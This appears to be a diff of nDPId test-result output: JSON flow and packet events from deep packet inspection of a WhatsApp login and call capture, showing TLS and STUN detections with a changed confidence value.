{"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582230648,"flow_last_seen":1432582230862,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1432582230862,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582230648,"flow_last_seen":1432582231003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1432582231003,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582233314,"flow_last_seen":1432582233314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582233314,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1432582233314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582233314,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0kh5AAEAGATfAqAIEXbqHCMAoAFBgmxszxhyTY4ARIABAdgAAAQEICi36RbdjLQIx"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1432582233380,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582233380,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0ewoAADkGX0tduocIwKgCBABQwCjGHJNjYJsbNIAQAebnbwAAAQEICmMteVEt+kW3"} @@ -100,35 +100,35 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1432582236282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236282,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoODNAAEAGygnAqAIEEaxkO8AcAbueodpRe0gK3lAQ\/\/+2TwAA"} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238790,"flow_last_seen":1432582238790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238790,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1432582238790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238790,"pkt":"xiwDYGpkAPS5Jrv0CABFwACarW0AAEARhl7AqAIEHw1kDsk+DZYAhpcUAAMAaiESpEIAAHUQ+ENDH9BeI3lAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238790,"flow_last_seen":1432582238790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238790,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238790,"flow_last_seen":1432582238790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238790,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1432582238790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238790,"pkt":"xiwDYGpkAPS5Jrv0CABFwACat4MAAEARfEjAqAIEHw1kDsk+DZYAhpcUAAMAaiESpEIAAHUQ+ENDH9BeI3lAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACayJAAAEARiRnAqAIEHw1GMMk+DZYAho7CAAMAaiESpEIAACUBlIyWX5N55xRAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaw2YAAEARjkPAqAIEHw1GMMk+DZYAho7CAAMAaiESpEIAACUBlIyWX5N55xRAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa2EoAAEARf1\/AqAIEHw1AMMk+DZYAhnzzAAMAaiESpEIAAN5oNK0Wc\/NrxVVAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa9a4AAEARYfvAqAIEHw1AMMk+DZYAhnzzAAMAaiESpEIAAN5oNK0Wc\/NrxVVAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa8J4AAEARUgvAqAIEHw1VMMk+DZYAhiWBAAMAaiESpEIAADIU0Oi5cQTqY2RAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaLVIAAEARFVjAqAIEHw1VMMk+DZYAhiWBAAMAaiESpEIAADIU0Oi5cQTqY2RAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaNZEAAEARBxnAqAIEHw1bMMk+DZYAhs2+AAMAaiESpEIAAJhbSrigEVALo05AAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa90wAAEARRV3AqAIEHw1bMMk+DZYAhs2+AAMAaiESpEIAAJhbSrigEVALo05AAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACahRkAAEARwwDAqAIEHw1PwMk+DZYAhkfEAAMAaiESpEIAADsyhsRFd5d2aQVAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1432582238792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238792,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaCdEAAEARPknAqAIEHw1PwMk+DZYAhkfEAAMAaiESpEIAADsyhsRFd5d2aQVAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1432582238792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238792,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaWjwAAEAR4G3AqAIEHw1dMMk+DZYAhleUAAMAaiESpEIAAOhOyhcXEAbXGlxAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238792,"flow_last_seen":1432582238792,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238792,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 